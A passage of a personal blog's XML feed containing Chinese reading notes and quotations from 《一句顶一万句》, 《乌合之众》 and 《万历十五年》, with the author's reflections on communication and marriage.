    <summary type="html">&lt;h1 id=&quot;《只有ICU医生知道》读后感&quot;&gt;&lt;a href=&quot;#《只有ICU医生知道》读后感&quot; class=&quot;headerlink&quot; title=&quot;《只有ICU医生知道》读后感&quot;&gt;&lt;/a&gt;&lt;strong&gt;《只有ICU医生知道》&lt;/strong&gt;读后感&lt;/h1&gt;&lt;p&gt;这本书是我</summary>
      
    
    
    
    <category term="书籍阅读" scheme="https://laobameishijia.github.io/category/%E4%B9%A6%E7%B1%8D%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="读后感" scheme="https://laobameishijia.github.io/tag/%E8%AF%BB%E5%90%8E%E6%84%9F/"/>
    
  </entry>
  
  <entry>
    <title>一句顶一万句读后感</title>
    <link href="https://laobameishijia.github.io/2025/04/19/yi-ju-ding-yi-wan-ju-du-hou-gan/"/>
    <id>https://laobameishijia.github.io/2025/04/19/yi-ju-ding-yi-wan-ju-du-hou-gan/</id>
    <published>2025-04-19T15:18:00.000Z</published>
    <updated>2025-04-30T08:50:54.040Z</updated>
    
    <content type="html"><![CDATA[<h1 id="《一句顶一万句》读后感"><a href="#《一句顶一万句》读后感" class="headerlink" title="《一句顶一万句》读后感"></a>《一句顶一万句》读后感</h1><p>这本书和《平凡的世界》不同，没有着重在讲个人的成长历程，而是在讲人与人之间的沟通，俗话叫说得来。书中的人物关系包含了朋友、陌生人、情人、祖孙，老杨和老马、老史与苏小宝、杨百顺与老裴、老詹、老贾，再到后来吴摩西与吴香香、吴巧玲，牛爱国与彭丽娜、章楚红，曹青娥与牛书道。大抵都是在讲主要人物杨百顺、曹青娥、牛爱国三人在各自生活中遇到的人以及与他们的交谈。</p><p>看完之后，我非但没有对生活中言语交流有有进一步的认识，反倒更迷茫了。人生中的不同阶段都会遇到形形色色的人，他们之中有人和你能说的来，有的则说不来。可怕的并不缺少一些能说得来的朋友，而是说得来就是说得来，说不来就是说不来，这个关系不会随着相处时间的长短而发生改变，至少书中是这样体现了。对应到生活里，我想到了奶奶家后面一家的儿媳妇跟着丈夫的同学跑了，想到了爷爷奶奶的对话，想到了爸爸和妈妈的对话，想到了叔叔和婶婶，还想到了舅舅和妗妗。我认为说得来这个东西太关键了，漫漫人生路，如果双方没有话说，那该是多么难受啊。</p><p>可意识到又如何呢，我无法判断我和人能否说得来，即便当下可以说得来，也无法预估以后。害怕的不是说不来，而是通过努力依旧无法改变这样的事实。书中的夫妻大都没有什么共同语言，婚姻几乎不是自由恋爱，除了相亲就是利益，位数不多的自由恋爱也在时间的长河里慢慢褪色，甚至失败了。这些夫妻关系中，有的是结婚之前就说不来，有的是结婚之间说得来，慢慢变得没话说。在这种关系中，有的人选择了逃避，找情人，有的人选择了坚持和迁就，维持着家庭生活。很难说两种选择具体哪个好，如果换做是我，我会坚持，因为换一个人也未必真得说得来，哪怕开始的时候你们说得来。</p><p>除了畏惧，我也在思考，说得来是不是真得像书中说得那样，无法通过后期努力改善。讨论这个问题首先要从说得来的内容说起，人与人互相交流的主要问题是爱好、抉择、工作、朋友等。当然除了内容，人也很重要，相处的人是不是愿意跟你一起寻找话题，创造话题。内容是可以改变的，你可以培养爱好，搜集做抉择的依据，了解她工作的内容，结交共同的朋友。但人是很难改变的，一般来讲，人的性格、三观和他的行事风格很难有什么变化，至少我是如此。所以找一个什么样的人就很关键了。</p><p>我想起之前大冰说过，他那些婚后过的很好的朋友，夫妻之间都有一个共同点，就是永远都有话说。有话说，还是永远都有话说。我能不能找到这样的人呢？工作和学业暂时都定了，唯有感情没有。我承认至少目前我还是基因的奴隶，习惯于被身材和外貌吸引，即便我经常提醒自己，这些阅读过的书籍也在提醒我，可我还是会忽视这些提醒。慢慢地这种一定要开始改变一下，外在的东西无法维持太长时间，而内在的品质包括三观、性格和与人沟通的能力是充斥在生活中各个方面的。人大多数时候都要通过反人性来获得幸福，何去何从，希望以后的自己能慎重做选择，同时能承担选择失败的责任。</p><p>生活都充满了随机性，更别说男女之间的感情，就像当年去衡水一样，各种巧合都会发生，我唯一能决定的是自己，我尽可能把自己培养成能适应各种性格的人，这样婚姻成功的概率就会更高一些。</p><hr><p>李奕轩  2025.04.19 下午4：00 晴</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;《一句顶一万句》读后感&quot;&gt;&lt;a href=&quot;#《一句顶一万句》读后感&quot; class=&quot;headerlink&quot; title=&quot;《一句顶一万句》读后感&quot;&gt;&lt;/a&gt;《一句顶一万句》读后感&lt;/h1&gt;&lt;p&gt;这本书和《平凡的世界》不同，没有着重在讲个人的成长历程，而是在讲人与</summary>
      
    
    
    
    <category term="书籍阅读" scheme="https://laobameishijia.github.io/category/%E4%B9%A6%E7%B1%8D%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="读后感" scheme="https://laobameishijia.github.io/tag/%E8%AF%BB%E5%90%8E%E6%84%9F/"/>
    
  </entry>
  
  <entry>
    <title>一句顶一万句书摘</title>
    <link href="https://laobameishijia.github.io/2025/04/16/yi-ju-ding-yi-wan-ju-shu-zhai/"/>
    <id>https://laobameishijia.github.io/2025/04/16/yi-ju-ding-yi-wan-ju-shu-zhai/</id>
    <published>2025-04-16T14:11:00.000Z</published>
    <updated>2025-04-30T08:50:54.040Z</updated>
    
    <content type="html"><![CDATA[<h1 id="《一句顶一万句》"><a href="#《一句顶一万句》" class="headerlink" title="《一句顶一万句》"></a><strong>《一句顶一万句》</strong></h1><ol><li><p>贼就贼吧，我五十顷地还养不起一个贼？</p></li><li><p>人心毒不是说它狠，是说大家遇事不往好处想，盼着事坏。</p></li><li><p>世上的事情，原来件件藏着委屈。</p></li><li><p>人要一堵上气，就忘记了事情的初衷，只能想着能气着别人，忘记了也耽误自己。</p></li><li><p>去年年底，老史不看锡剧看社火，不是因为锡剧看厌了，恰恰是因为苏小宝在苏州的老舅死了，苏小宝赶回苏州奔丧，老史觉得戏台上一下空了，这才抽出身来，看万民舞社火。老史不看社火，还发现不了杨摩西；杨摩西能进县政府，以为该感谢社火，其实应该感谢锡剧中这位男旦苏小宝，接着应该感谢苏小宝的老舅，死得是个时候。</p></li><li><p>遇小事可以指望别人，遇到大事，千万不能把自个儿的命运，栓到别人身上。</p></li><li><p>如今天天揉馒头蒸馒头，日子太实了。正是因为太实了，所以想”虚“一下。</p></li><li><p>明白不是明白吴香香，而是明白自己；既然遇事跟她计较不是，计较也计较不过她，不如像老高对待老白一样，干脆不计较；或者，反正与她说不明白道理，这时再计较道理，反倒是不懂道理了。（<strong>吴摩西没有想到的是，吴香香和老高早在三四年前就已经在一起了，那时姜武甚至还在世</strong>）</p></li><li><p>牛爱国虽然当的也是汽车兵，但到了部队，并没有开上汽车，在炊事班做饭；杜清海虽然当的是步兵，但连队有一辆卡车，他倒在连队开汽车。</p></li><li><p>几个”你说呢“下来，杜青海也将自己的事码清楚了，二人心思都轻快了许多。</p></li><li><p>不爱说话和没话说是两码事。</p></li><li><p>爱不爱说话，原来也要看是跟谁在一起。</p></li><li><p>这种事，俗话说得好，捉贼要捉脏，捉奸要捉双，没有捉住，这种事，宁信其无，不信其有。</p></li><li><p>又三年过去，牛爱国方知，在部队的时候，杜清海给自己码放事情，出的都是好主意；唯有在滹沱河畔，他和庞丽娜的事，杜青海出的主意，打根上就错了。</p></li><li><p>戏里说的事，也是世上的事，怎么戏里说的，就比世上的事有意思呢？</p></li><li><p>我一下又感到自己被卖东西生地方。爹，到一个新地方，我夜里怕黑。</p></li><li><p>过去能跑的时候没跑，现在不能跑的时候跑了，要说可怜，也就这点可怜。</p></li><li><p>会说话不是说他话多，嘴不停，而是说起话来，不与你抢话，有话让你先说，他再接着说。</p></li><li><p>曹青娥这时才明白，人是掰扯不得的，掰扯了别人，就是掰扯了自己。</p></li><li><p>她的亲爹姜虎，当年就是死在山西沁源县，没想到曹青娥长大，又嫁到了沁源县。</p><hr><p>2025.04.17 晚9:15 星期四</p></li><li><p>牛爱国一笑，两人又说起小学时班上的许多同学，冯文修、马明起、李顺、杨永祥、宫益民、崔玉芝、董海花等。二十多年过去，都各奔东西；其中一个叫王家成的已经死了，一个叫胡双利的疯了。李克智：“人生在世，草木一秋哇。”</p></li><li><p>我活了七十岁，明白一个道理，世上别的东西都能挑，就是日子没法挑。</p></li><li><p>你跟她说得着，是因为她现在由丈夫养着，你就是与她说个话；等你养她，就成了过日子，到时候就该说过日子了。</p></li><li><p>儿女在世上都不如意，让曹青娥有话无处说，或者有话不说，除了是失望，还有对他们的无奈罢了。</p></li><li><p>如是过去，牛爱国觉得饭馆老板说得对，现在却觉得他说错了。事情想不明白，人的忧愁还少些；事情想明白了，反倒更加忧愁了。</p></li><li><p>啥事看近点儿，事情倒能想得开；看得长，心就更宽不了了。</p></li><li><p>从车上往下看，空空荡荡的汽车站里，就剩下娘一个人，拄着拐杖，嘴在张着，曹青娥不禁流下了泪。</p></li><li><p>解释不清不是事情不好解释，而是事情之中藏着的曲里拐弯的道理，一时无法说清楚。</p></li><li><p>牛爱国也明白了，妈曹青娥临走的时候，想带走一把手电，路上好照亮，临死时喊“爹”，或者打着手电好找爹。妈曹青娥养了四个儿女，最终能猜出她心思的，竟是七岁的百惠。</p></li><li><p>你看看，一年多没见，你咋成了我，我咋成了你。</p></li><li><p>姐已经老了，牛爱国看姐，姐确实老了，眼角堆满了皱纹，脸上的肉往下嘟噜着。</p></li><li><p>这时，牛爱国想起妈曹青娥活着的时候，给他讲她爹吴摩西的故事。当年曹青娥还叫“巧玲”的时候，她娘吴香香跟着银匠老高跑了。吴摩西和巧玲去找吴香香和老高，就是假找。没想到七十年过去，自己也成了吴摩西，两个出门假找的人，一个是曹青娥的爹，一个是她的儿子。</p></li><li><p>日子是过以后，不是过从前。我要是想不清楚这一点，也活不到今天。这话跟妈曹青娥生前说得一样。</p><hr><p>2025.04.19 周六 晴 下午3:17</p></li></ol><h3 id=""><a href="#" class="headerlink" title=""></a></h3>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;《一句顶一万句》&quot;&gt;&lt;a href=&quot;#《一句顶一万句》&quot; class=&quot;headerlink&quot; title=&quot;《一句顶一万句》&quot;&gt;&lt;/a&gt;&lt;strong&gt;《一句顶一万句》&lt;/strong&gt;&lt;/h1&gt;&lt;ol&gt;
&lt;li&gt;&lt;p&gt;贼就贼吧，我五十顷地还养不起一个贼？&lt;/</summary>
      
    
    
    
    <category term="书籍阅读" scheme="https://laobameishijia.github.io/category/%E4%B9%A6%E7%B1%8D%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="书摘" scheme="https://laobameishijia.github.io/tag/%E4%B9%A6%E6%91%98/"/>
    
  </entry>
  
  <entry>
    <title>乌合之众书摘</title>
    <link href="https://laobameishijia.github.io/2025/04/09/wu-he-zhi-zhong-shu-zhai/"/>
    <id>https://laobameishijia.github.io/2025/04/09/wu-he-zhi-zhong-shu-zhai/</id>
    <published>2025-04-09T15:17:00.000Z</published>
    <updated>2025-04-30T08:50:54.040Z</updated>
    
    <content type="html"><![CDATA[<p>文明诞生之初，一群来自不同地方的人，因为移民、入侵或占领等原因聚集在一起。他们血缘不同，语言和信仰也不同。法律是这些人结为一体的唯一纽带，尽管相关法律并没有完全得到所有头领的承认。这些混乱的人群，有着十分突出的群体特征。他们有短暂的团结，有英雄主义、易冲动、性情狂狷等群体特征。没有什么东西能把他们牢固地联系在一起，因为他们是野蛮人。漫长的岁月是真正的造化者，种族就是它的作品。在环境长期一致、种族间不断通婚、一起共同生活等因素的作用下，不同的小群体慢慢融合成一个整体、一个种族，一个有着共同特征和感情的群体就此形成了，并且在遗传的作用下日益稳固。这群人变成了一个民族，渐渐有能力摆脱它的野蛮状态了。但是，只有在长期努力，经过不断重复的斗争以及无数次的反复，它才能获得某种理想之后，走出野蛮状态。</p><p>这个理想的性质并不十分重要，不管是崇拜罗马、雅典的强盛还是真主的胜利，都足以让一个种族中的每个人在感情和思想上形成完全的统一。在这个时候，一种包含着新制度、新信念和新艺术的新文明便诞生了。在追求自己理想的过程中，种族会逐渐具备某些素质，某些建立丰功伟业不可缺少的素质。无须怀疑，它有时仍然是乌合之众，但在它变幻不定的特征背后，会形成一个稳定的基础，即这个种族的秉性。种族的秉性支配着该种族狭小的范围内的机遇。时间在做完其创造性工作之后，便开始破坏的过程。不管是神还是人，全都无法逃出它的手掌。当某种文明强盛到一定的程度，复杂到一定程度之后，便会止步不前。一旦止步不前，便注定走向衰落。</p><p>衰落是不可避免的，它以种族支柱——理想——的衰弱为标志。基于理想建立起的宗教、政治和社会结构也会随之发生动摇。随着种族的理想的消亡，种族团结、强盛的品质也会慢慢消失。个人的个性和智力可以增长，但种族集体的自我意识却会被个人强烈的自我意识的过度发展所取代，并伴随着种族性格的弱化和行动能力的衰弱。本来是一个民族、一个联合体、一个整体的人群，最终会变成一群缺乏凝聚力的个人——散沙。他们在一段时间里，仅仅因为传统和制度而被人为地聚集在一起。在这个阶段，人们被个人利益和愿望搞得四分五裂，失去了治理的能力，即使在最微不足道的事情上，也需要领导管理，于是，国家开始发挥引人注目的影响。</p><p>随着种族的理想的消亡，种族团结、强盛的品质也会慢慢消失。个人的个性和智力可以增长，但种族集体的自我意识却会被个人强烈的自我意识的过度发展所取代，并伴随着种族性格的弱化和行动能力的衰弱。本来是一个民族、一个联合体、一个整体的人群，最终会变成一群缺乏凝聚力的个人——散沙。他们在一段时间里，仅仅因为传统和制度而被人为地聚集在一起。在这个阶段，人们被个人利益和愿望搞得四分五裂，失去了治理的能力，即使在最微不足道的事情上，也需要领导管理，于是，国家开始发挥引人注目的影响。随着古老理想的丧失，这个种族的才华也消失殆尽了。从此，这个种族的人仅仅是一群独立的个人，他们回到了自己的原始状态——群体。他们既缺乏统一性，也没有未来，只有乌合之众的短暂的特性。他们的文明失去了稳定性，只能随波逐流。群众掌握至上的权力，野蛮风气盛行。文明也许依然辉煌，源远流长的历史赋予其华丽的外表，但这座岌岌可危的大厦早已被侵蚀，支撑不了多久，风暴一来，立刻就会崩塌。从野蛮到文明，一路追寻梦想，当这个梦想失去力量的时候，便开始衰落，最终走向死亡。这就是一个民族的生命周期。</p><ol><li><p>群体心理有着与“理性”个人完全不同的心理特征，而且群体不同，心理特征也不同。</p></li><li><p>这是因为，历史的所有事实无一例外地向我们证实，社会组织和一切生命有机体一样繁复庞杂，我们无权强迫社会组织在一夜之间突然完成深远变革。</p></li><li><p>所有历史事件无一例外地告诉我们，若文明赖以建立的道德基础失去力量，无意识的野蛮群体最终会通过各种暴力革命手段迫使其解体或毁灭。</p></li><li><p>领导群体靠的不是纯粹的平等学说，而是情感。群体是情感的奴隶，只要找到能让他们动心的东西即可。</p></li><li><p>打算实施新税制的立法者会选择最公正的税收方式吗？不，对群体来说，最“不公正”的才是最好的。那些清楚易懂、负担小的税收制度，才是最容易被人们接受的。每天为日常消费品支付一点儿税金，不会干扰群体的消费习惯，如此，征税就在不知不觉中进行了。倘若按薪资或其他任何收入的比例征税，让纳税人一次性缴一大笔钱，哪怕这种税制的负担比其他税制轻十倍，都会招致无数人的反对。立法者深知，数额较大的支出，容易刺激人们的金钱损失想象，所以新税收制度常常用难以察觉到的办法实行。而这种远见，正是群体缺乏的。</p></li><li><p>意识人格的消失和情感、思想向一个明确方向的转变，是即将形成有组织的群体的主要特征。</p></li><li><p>由于任何一种精神结构都包含各种性格的可能性，环境突变会让其中某些可能性表现得更为突出。</p></li><li><p>在对待包括宗教、政治、道德、爱憎等属于情感领域的每一件事情的态度上，智商再怎么杰出的人，也不见得比凡夫俗子高明多少。一个伟大数学家和鞋匠之间的智商可能有天壤之别，但就性格来说，他们之间的差别微乎其微，甚至根本没有。</p></li><li><p>在群体中，每种感情和行动都有传染性，其程度足以使个人随时准备为集体利益牺牲个人利益，而这正是与个人与生俱来的天性极为对立的情感倾向，如果不是成为群体中的一员，则很难产生这种情感倾向</p></li><li><p>群体是个无名氏，个人不必承担责任，如此以来约束着个人行为的责任感便消失了，他便会肆意妄为。</p></li><li><p>孤立的个人具有主宰自己的反应行为的能力，群体则缺乏这种能力。</p></li><li><p>群体意识里没有障碍一说，即使是有，那也是充满敌意的挑衅。</p></li><li><p>群体对于这样一个事实视若无睹，他们永远只看到他们认为应该看到或者他们希望看到的东西。这就意味着，群体惯于用歪曲性的想象力把这种由想象建立的幻觉与真实的事实混为一谈。</p></li><li><p>我们习惯于说童言无忌，哪怕只有一点基本的心理学修养，也会知道事情恰恰相反，儿童最爱撒谎。</p></li><li><p>当历史传承到需要记载下来的那一刻时，早已丧失了它的本来面貌，我们只能把史学著作当作纯粹想象的产物。它们是对观察有误的事实所做的无根据的记述，并且混杂了作者对思考结果的解释。</p></li><li><p>各种事实都证明群体的证词极不可靠，它甚至能够达到无以复加的地步。</p></li><li><p>那些在人类历史上发挥过重大作用的伟大人物，如赫拉克利特、释迦牟尼或穆罕默德，我们有一句真实的记录吗？极可能一句也没有。所有能够打动群众的，能够在群众范围内得以流传并保留下来的，只是这些伟人在神话中的形象。实事求是地说，他们的真实生平对我们来说无关紧要。我们想要知道的，是伟人在神话中呈现的形象。我们要的是能打动我们心灵的神话英雄，而不是一时的真实英雄。</p></li><li><p>群体的想象力会改变一切，不论这件事是真实的还是虚构的。正因为这样，历史才会背离它的真相，呈现出光怪陆离的面貌。</p></li><li><p>不幸的是，群体感情的夸张倾向，通常把人类的恶劣表现到极致。1527年5月6日夜，罗马被雇佣军占领，八千多名百姓被杀，但这只是开始。夜晚狂欢过后，极度激动的雇佣兵开始洗劫教堂，他们还洗劫教堂和要人的宫殿，闯进修道院强奸修女，残酷迫害百姓。</p></li><li><p>群体很容易干出恶劣、极端的勾当。这是原始人的本能遗传的残留，孤立的个人因为担心受罚，不得不约束自己</p></li><li><p>群体只是擅长把感情提升到极高或极低的境界。</p></li><li><p>希望感动群体的演说家必须锋芒毕露、信誓旦旦。他们少不了要夸大其词，而且以不断重复、绝对不说理的方式证明任何事情——这些都是演说家惯用的技巧。</p></li><li><p>他们并非是有所醒悟，因为群体只会干两种事，锦上添花或落井下石。群体喜欢践踏被他们剥夺了权力的专制者。群体随时会欺压软弱者，但对强权低声下气！</p></li><li><p>群体最终会回归保守，群体可能渴望通过改朝换代换取卑微的需求，为了达到目的，他们常常发动暴力革命，但却常常沿用旧制度，从中国王朝的更迭中便可看出端倪。这些旧制度本质反映出了种族对等级制的需要，因此专制者轻易便能拥有整个种族的顺从。</p></li><li><p>在生活中，有的人因为不能向自己的同胞发泄这种本能，便发泄在动物身上。群体捕猎的热情与凶残，和这种破坏性本能，有着同样的根源。群体杀死没有反抗能力的牺牲者，正是十分懦弱的残忍。</p></li><li><p>回顾历史，我们发现，群体为了一知半解的信仰、观念和只言片语，便可以英勇地面对死亡。</p></li><li><p>如果不计名利、顺从和绝对献身于真正的（或虚幻的）理想都算作美德的话，那么毋庸置疑，群体最具备这些美德，而且他们达到的水平，哪怕是德行最高尚的哲学家也望尘莫及。</p></li><li><p>只有简单而明了的观念，才能被群体接受，但并不是所有观念都是简单明了的，因此必须经过一番彻底改造，使之变得通俗易懂，才能被平庸的大众接受。那些高深莫测的哲学或科学观念，群体自卑心理导致的智力水平根本无法理解，更别谈接受了。因此，对它们的改造必须更加彻底。种族间理性程度和聪明才智都不同，因此这种改造有时大一些，有时小一些，但都必须向低俗化和简单化改造。</p></li><li><p>群体推理只是把表面上相似的事物搅在一起，并且会立刻把具体的事物普遍化。不妨说他们并不推理或只会错误地推理，而且也绝不会受到推理过程的影响。</p></li><li><p>凡是和群体有密切交往的演说家，无一不擅长建立对群体有诱惑力的形象。任何一个人做到这一点，便可以达到自己的目的。即使是20本富有真知灼见的著作，也不如几句有感召力的话语更能说服群众。</p></li><li><p>有些意见轻而易举就得到普遍认同，这是因为大多数人没有能力根据推理形成自己的独特看法。</p></li><li><p>表象总是比真相起着更重要的作用，群体无视现实，无论是亲眼所见，还是逻辑严谨的劝告，群体都不为所动。那些能活灵活现反映人物形象的戏剧表演，就能对群体产生巨大的影响。</p></li><li><p>想领导群体，就得在他们的想象上下功夫。几乎所有侵略者的权力和国家的威力，都是建立在群体的想象上的。</p></li><li><p>究竟如何影响群众想象力呢？只需要注意一点，不可求助于智力和推理，这也就是说，绝对不能够采用论证的方式。</p><hr><p>2025.04.09 星期三 晚21：00</p></li><li><p>假如我们对群体的这些特点做更细致的研究，就会发现无论是在狂热宗教信仰的时代，还是政治大动荡的时代，都有同样的感情和古怪的形式——没有比宗教感情更好的称呼了，这就是偶像崇拜。</p></li><li><p>偏执与妄想是宗教感情的必然伴侣。</p></li><li><p>无论时代进步到何种程度，即使不再有圣坛与雕像存在，也会有新的形式来替代。</p></li><li><p>只有经验这位最好的老师最终会指出我们的错误——必须废除我们那些可恶的教科书和可悲的考试，代之以勤劳的教育，让我们的年轻人回到田野和工厂，回到他们今天不惜任何代价逃避劳动的事业。向人灌输大量肤浅的知识，不出差错地背诵教科书，不可能提高我们的智力水平。能够帮助我们走向成功的条件是判断力，是经验，是开拓精神和个性！而这些优良品质，偏偏不是死读书就能得来的。</p></li><li><p>思想只有在自然而正常的环境中才能形成。因此，我们需要年轻人每天从工厂、矿山、法庭、建筑工地和医院等地方，获得大量的感官印象；他得亲眼看到各种工具、材料和操作；他得与顾客和劳动者在一起，不管他们干得是好是坏，也不管他们是赚是赔。只有采用这种方式，他们才能对那些从眼睛、耳朵、双手甚至味觉中得到的各种细节，得到微不足道的理解。学习者在不知不觉中获得了这些细节，默默地推敲，在心中逐渐成形，并且或迟或早地产生一些提示，让他们着手新的组合、简化、创意、改进或发明。</p></li><li><p>在教育的三个阶段，即儿童期、少年期和青年期，如果从考试、学历、证书和文凭的角度看，坐在学校板凳上啃理论和教科书的时间长得过头了，而且负担过重。采用的方法也糟糕透顶，以至于已经成为一种严重违反自然的、与社会对立的制度。过多地延长在学校学习的时间，培养懒汉的寄宿制度，过多的人为训练、教学和功课，对今后的时代完全没有考虑，对人的职业缺乏安排，对年轻人很快就要投身其中的现实世界装聋作哑，不考虑学生如何适应社会，不考虑人类为保护自己而必须从事的斗争，不教学生如何保持坚强意志……</p></li><li><p>有必要的准备、最重要的学习、丰富的常识、坚忍不拔的意志力，凡是年轻人应该拥有的知识，我们的学校一样也没有教。我们的教育不但没有让他们获得更好的生存能力，反而破坏了这些能力。这使得我们的年轻人一走入社会，进入他的活动领域，就开始遭遇一系列的痛苦与挫折，由此给他造成的创痛久久不能痊愈，甚至让他失去生活能力。这样的教育制度，对年轻人的精神和道德都造成了不良影响，甚至有难以恢复的可能。学校的幻想与美梦，在严酷的现实面前彻底地破灭了，强烈的欺骗感、失望感，是一个心理素质不完备的青年人难以承受的。</p></li><li><p>如果想要让群众相信什么，就先得搞清楚让他们兴奋的感情，再假装自己也有这种感情，必要时还得用极端的行为表现对这些感情的狂热。再打一套低级组合拳，用一些非常富有暗示性的概念改变他们的看法。如捏造场景、追忆往昔、憧憬未来等，这样才能够引导大众回到最初提出的观点上来，慢慢揭开激起某种感情的目的。</p></li><li><p>人和动物一样，有模仿的本能。这是必然的，因为模仿总是比创造容易。正是这种模仿，使得所谓时尚的力量如此强大。无论是意见、观念、文学作品还是服装，有多少人有足够的勇气与时尚作对？支配大众的是榜样，不是论证</p></li><li><p>包括意志在内的一切事物都会屈服于衰老</p></li><li><p>不存在任何引导意见的力量，再加上普遍信仰的毁灭，其最终结果就是对一切秩序都存在着极端分歧，并且使大众对于一切和他们没有直接利益的事情都漠不关心。</p></li><li><p>从众行为导致我们服从别人的怂恿</p></li><li><p>无论是天才还是智障，只要一受大众领袖的影响，就变成了被无意识情绪支配的生物。</p></li><li><p>要求一个善于思考的团体就某个并非技术性的问题发表意见时，智力就起不了多少作用。</p></li><li><p>群体的权力令人生畏，然而身份团体的权力更让人害怕。</p></li><li></li></ol>]]></content>
    
    
      
      
    <summary type="html">&lt;p&gt;文明诞生之初，一群来自不同地方的人，因为移民、入侵或占领等原因聚集在一起。他们血缘不同，语言和信仰也不同。法律是这些人结为一体的唯一纽带，尽管相关法律并没有完全得到所有头领的承认。这些混乱的人群，有着十分突出的群体特征。他们有短暂的团结，有英雄主义、易冲动、性情狂狷等群体特</summary>
      
    
    
    
    <category term="书籍阅读" scheme="https://laobameishijia.github.io/category/%E4%B9%A6%E7%B1%8D%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="书摘" scheme="https://laobameishijia.github.io/tag/%E4%B9%A6%E6%91%98/"/>
    
  </entry>
  
  <entry>
    <title>万里十五年书摘</title>
    <link href="https://laobameishijia.github.io/2025/04/05/wan-li-shi-wu-nian-shu-zhai/"/>
    <id>https://laobameishijia.github.io/2025/04/05/wan-li-shi-wu-nian-shu-zhai/</id>
    <published>2025-04-05T19:28:00.000Z</published>
    <updated>2025-04-30T08:50:54.040Z</updated>
    
    <content type="html"><![CDATA[<ol><li><p>宫廷固然伟大，但是单调。即使有宫室的画栋雕梁和其他豪华装饰，紫禁城也无非是同一模式的再三再四的重复。</p></li><li><p>这一切都不能改变精神世界中的空虚和寂寞。在按着固定节奏流逝的时光之中，既缺乏动人心魄的事件，也缺乏龄人企羡的奇遇，这种冷酷的气氛笼罩一切，即使贵为天子，也很难有所改变。</p></li><li><p>她们的尸体经过火化后，埋葬在没有标记的坟墓里。</p></li><li><p>她是在最适当的时机来到了他的生活里，填补了他精神上的缺陷。凭借着机智和聪明，她很快就理解了命运为她作的安排，因而抓住现实，发挥了最大的能动性，从而达到自己预期的目的。</p></li><li><p>他询问这些与试举人，为什么他越想励精图治，但后果却是官僚的更加腐化和法令的更加松懈？这原因，是在于他缺乏仁民爱物的精神，还是在于他的优柔寡断。</p></li><li><p>但是不久以后，他就会发掘，他摆脱了张、冯之后所得到的自主之权，仍然受到种种约束，即使贵为天子，也不过是一种制度所需的产物。</p><hr><p>2025.04.05 晚19:25 </p></li><li><p>为什么万历在这个问题上没有采取更为强硬的立场，例如坚决地公开宣布他的主张，而且一口咬定立储大计属于他的权力范围，不容旁人置喙，而且进一步以意图不能实现即自动退位作为威胁，这都已经无法找到答案了。也许有一条理由可以作为解释，即本朝不是以法律治理天下臣民，而是以“四书”中的伦理作为主宰。皇帝和全国臣民都懂得父亲对儿子不能偏爱，哥哥对弟弟负有教导及爱护的义务，男人不能因为宠爱女人而改变长幼之序。正因为这些原则为天下人所普遍承认，我们的帝国才在精神上有一套共同的纲领，才可以上下一心，臻于长治久安。如果仅仅凭法律的条文作为治国的依据，则我们立国的根本就成了问题，一千多个县很难以父母官的身分领导他治下成千成万的庶民。所以，万历要弃长立幼的企图，纵使在法律上有可以左右迁就之处，但在坚持传统观念的臣僚心目之中，却早已不直于纲常伦理。臣僚们从来没有听说法律的施用可以与圣贤的教导相违，即使是皇帝也不得不承认这一点。在这样强大的道德和舆论的压力之下，他在公开场合不得不发表违心之论，否认他有弃长立幼的企图。</p></li><li><p>他们所需要的只是一个个性平淡的君主作为天命的代表，其任务就是在他们的争端无法解决时作出强制性的仲裁。他们要求这位守成之主与日常的生活隔绝，在仲裁争端中不挟带个人的嗜好和偏爱以引起更多的纠纷。</p></li><li><p>这种局面不打破，文官的双重性格发展得越来越明显，这也是精神与物质的分离。一方面，这些熟读经史的人以仁义道德相标榜，以发挥治国平天下的抱负为国家服务，以自我牺牲自许；一方面，体制上又存在那么多的罅隙，给这些人以那么强烈的引诱。</p></li><li><p>皇位是一种社会制度，他朱翊钧却是一个有血有肉的个人。一登皇位，他的全部言行都要符合道德的规范，但是道德规范的解释却分属于文官。</p></li><li><p>但是今天的大学士申时行对此早已涣然冰释，理解了其中的精微奥妙，因为我们的帝国在体制上实施中央集权；其精神上的支柱为道德，管理的方法则依靠文牍。</p></li><li><p>他的老成来自长期处理各项人事经验；这种经验，使他深知，我们这个帝国有一个特点：一项政策能否附注实施，实施后或成或败，全看它与所有文官的共同习惯是否相安无忧，否则理论上的完美仍不过是空中楼阁。</p></li><li><p>所以说来说去，施政的要诀，仍不外以抽象的方针为主，以道德为一切事业的根基。</p></li><li><p>因之，我们的政事，注重体制的安定，而不计较对一人一事的绝对公允。</p></li><li><p>管理我们这样一个大帝国，在许多问题上一定是要生罅隙的，张居正以整饬纪律自居，而实际上他是强迫要求各人保证不生罅隙。申时行用恕道待人，又鼓励诚信，就是期望各人自动地各尽其能地补救罅隙。</p></li><li><p>与海瑞同时的人所不能看清楚的是，这一段有关司法的建议恰恰暴露了我们这个帝国在制度上长期存在的困难：以熟读诗书的文人治理农民，他们不可能改进这个司法制度，更谈不上保障人权。</p></li><li><p>一个农民家庭如果企图生活稳定，并且获得社会声望，惟一的道路是读书做官。然而这条道路漫漫修远，很难只由一个人或一代人的努力就能达到目的。通常的方式是一家之内创业的祖先不断地劳作，自奉俭约，积铢累寸，首先巩固自己耕地的所有权，然后获得别人耕地的抵押权，由此而逐步上升为地主。这一过程常常需要几代的时间。经济条件初步具备，子孙就得到了受教育的机会。这其中，母亲和妻子的自我牺牲，在多数情形之下也为必不可少。所以表面看来，考场内的笔墨，可以使一代清贫立即成为显达，其实幕后的惨淡经营则历时至久。这种经过多年的奋斗而取得的荣誉，接受者只是一个人或至多几个人，但其基础则为全体家庭。因此，荣誉的获得者必须对家庭负有道义上的全部责任，保持休戚与共的集体观念。</p></li><li><p>当一个人口众多的国家，各人行动全凭儒家简单粗浅而又无法固定的原则所限制，而法律又缺乏创造性，其社会发展的程度必然受到限制</p><hr><p>2025.04.08 下午 3:10</p></li></ol>]]></content>
    
    
      
      
    <summary type="html">&lt;ol&gt;
&lt;li&gt;&lt;p&gt;宫廷固然伟大，但是单调。即使有宫室的画栋雕梁和其他豪华装饰，紫禁城也无非是同一模式的再三再四的重复。&lt;/p&gt;
&lt;/li&gt;
